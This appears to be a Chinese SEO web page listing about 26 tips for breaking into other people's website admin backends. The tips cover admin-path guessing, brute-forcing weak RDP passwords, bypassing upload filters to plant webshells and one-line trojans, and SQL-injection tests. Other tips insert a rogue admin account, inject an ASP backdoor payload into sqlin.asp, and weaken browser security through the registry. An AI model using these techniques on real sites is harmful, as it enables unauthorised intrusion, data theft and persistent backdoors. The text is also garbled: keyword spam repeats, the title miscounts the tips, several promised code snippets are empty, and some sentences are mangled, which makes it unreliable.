怎么进网站源码的后台-总结16种网站渗透技巧经验

1、利用网站的宽松过滤直接绕过后台验证,在网站后面添加admin/session.asp或admin/left.asp。

2、部分网站进入后台时会出现脚本提示框。 输入:管理员即可突破! 因为admin就是以管理员身份进入的意思。

3、部分网站启用了3389。 入侵前,先连接3389,尝试弱口令或爆破。 或者,按 5 次 Shift 键查看是否有人安装过后门,然后尝试设计密码

4、有时进入后台时会弹出“请登录”的提示框。 复制地址(不能复制),然后放到网页源码分析器中,选择浏览器-勾选跳转拦截-查看即可进入后台!

5、突破防盗链访问webshel​​l,代码:javascript:document.write(“fuck”),回车后点击GO进入webshel​​l

6、突破一流信息监控拦截系统的接入。 当小马可以访问,但上传大马不能访问时,可以先用大马将其与图片合并怎么进网站源码的后台,将合并后的图片上传,然后备份数据库,然后再访问!

源代码的网站_网站源码后门_怎么进网站源码的后台

7、使用编辑器shell时,上传时有时会过滤掉asp|asa|cer|php|aspx等扩展名。 其实只要加上aaspsp来上传asp,文件就会被破坏。

8. 有时AhD 猜测表段怎么进网站源码的后台,但无法猜测字段。 你可以到后台查看源文件,搜索ID或者类型,一般都可以找到。 然后给AhD添加字段来猜测内容就可以突破了。 。

9. 您可以使用此技术作为社工后台密码。 如果网站域名为: 管理员名称为admin,可以尝试使用密码“baidu”和“baidu.com”登录。

10、手动注入时,如果网站过滤了and 1=1和1=2,可以用xor 1=1 xor 1=2来判断。

11、本地构建一句话木马上传。 如果提示“请先选择您要上传的文件![重新上传]”,则说明文件太小。 用记事本打开,再复制几句话扩大文件大小,重新上传。 就是这样。

12、使用ahd秒表时,跑步字段名name和pass无法显示,显示长度超过50什么的。 如果猜不出来,那么结果通常就是跑穿山甲!

13.猜管理员后台提示,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp会出现菜单导航,然后迅雷下载所有链接。

14.知道表名和字段,使用SQL语句在ACCESS数据库中添加用户名和密码语句:Insert into admin(user,pwd)values('test','test')

15、当您获取管理员密码但无法获取管理员帐号时,请到前台打开新闻条目,查找“提交者”、“发布者”等字样。 一般来说,“提交者”是管理员。 帐户。

16、爆破ASP+IIS设置的网站的绝对web路径。 假设网站首页为:提交,fkbhvv.aspx不存在。

17. 源代码的利用。 许多网站使用从互联网下载的源代码。 有些站长很懒,不做任何改变。 然后他们上传并激活网站。 我们可以下载一套,里面包含了很多默认的信息。 使用。

18. 将以下代码上传到webshel​​l。 后缀是asp。 即使别人发现了,也无法删除。 是一款超级防删除的一句话木马。 它可以非常安全地留下后门。 斩波器连接密码:x

19、当账号密码被破解但找不到后端时,可以尝试连接FTP。 如果域名为:“获取到的密码是“bishi”,我们可以尝试使用“xxxx”“xxxx.cn”作为FTP用户名,使用“bishi”:作为FTP密码登录,有机会成功率很高!ftp默认端口:21 默认账号密码:test

20、部分后台不显示验证码,无法登录吗? 事实上,你可以通过将一段代码导入注册表来克服这个困境。 将以下代码另存为Code.reg,双击导入!

注册表编辑器4

源代码的网站_网站源码后门_怎么进网站源码的后台

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSecurity]

"BlockXBM"=dword:00000000

21、当网站不允许上传asp、asa、php等文件时,我们可以上传一个stm文件,代码为“”

(只要写出你要查看的文件的文件名即可,这里我假设你要查看“conn.asp”),然后直接打开stm文件的地址,然后查看源代码。 “conn.asp”文件的代码一目了然。 !

22、当网站不允许上传ASP、CGI、CER、CDX、HTR等类型文件时,尝试上传一个shtm文件,内容为:

如果上传成功,那就太好了。 通过访问该地址即可浏览conn.asp的内容。 这样你就有了数据库路径了!

23、手动检测注入点,并提示“您的操作已被记录!” 会弹出。 访问此文件:sqlin.asp。 如果存在,则在注入点后面植入木马:'excute(request("TNT" ))

然后用一句木马客户端连接:上传木马获取shell,因为很多反注入程序都是使用文件名“sqlin.asp”来创建非法记录的数据库。

24. 附带说明一下,您必须选择支持 aspx 的站点。 问题是如何判断? 方法非常简单。 在网站末尾添加xxx.aspx。 如果“/”应用程序返回服务器错误,找不到资源,则出现404画面,表明支持aspx木马。

25、网站后面添加test.php,查看版本

26、这两个网站后台文件禁忌admin_index.asp、manage_login.asp